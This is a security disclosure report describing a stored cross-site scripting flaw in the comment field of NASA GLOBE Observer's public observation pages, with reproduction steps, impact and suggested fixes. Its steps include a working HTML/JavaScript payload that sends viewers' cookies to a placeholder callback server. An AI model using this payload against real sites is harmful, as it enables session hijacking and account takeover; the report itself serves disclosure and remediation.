Summary by GKData
NASA GLOBE Observer Mobile App / Web - Stored XSS Vulnerability
Affected Endpoint
https://www.globe.gov/web/
Affected Feature
Observation Comments (Publicly Shared)
Summary
A stored XSS vulnerability was discovered in the comment field of shared observations within the NASA GLOBE Observer mobile app. By injecting malicious HTML/JS code in the comment, I was able to execute JavaScript in the browser context of any user viewing the observation. The payload was executed automatically upon page load and was reflected on public/shared observation pages.
This allows full session hijacking and account compromise, especially due to the ability to exfiltrate session cookies to an external server.
Steps to Reproduce
- Install the NASA GLOBE Observer mobile app.
- Create or select any observation. I chose tree measurement and just took random photos on the observer app for latest iOS—this renders on the web version of viewing observations globally.
In the "comment" field, input the following payload:
<img src=x onerror="new Image().src='https://CALLBACKURLHERE?cb='+encodeURIComponent(document.cookie)">Submit the observation.
Visit the observation's public/shareable URL (e.g.,
https://www.globe.gov/web/lightrip/...) from any other account or incognito session.Upon loading the page, the script:
- Executes automatically
- Sends the user's cookies to the attacker's server
- Demonstrates persistent stored XSS shared across all users
Impact
- Stored XSS across all users
- Full session hijacking via stolen cookies
- Arbitrary JS execution in NASA user sessions
- Persistent across shared/public observation URLs
- Could be chained for full account takeover or privilege escalation
Suggested Fix
- Sanitize all input in comment fields to disallow any HTML tags or JavaScript
- Encode all user-generated content before rendering
- Use a JavaScript sanitization library like DOMPurify on the client-side, and enforce HTML escaping on the server-side
- Apply CSP headers to mitigate risk of inline script execution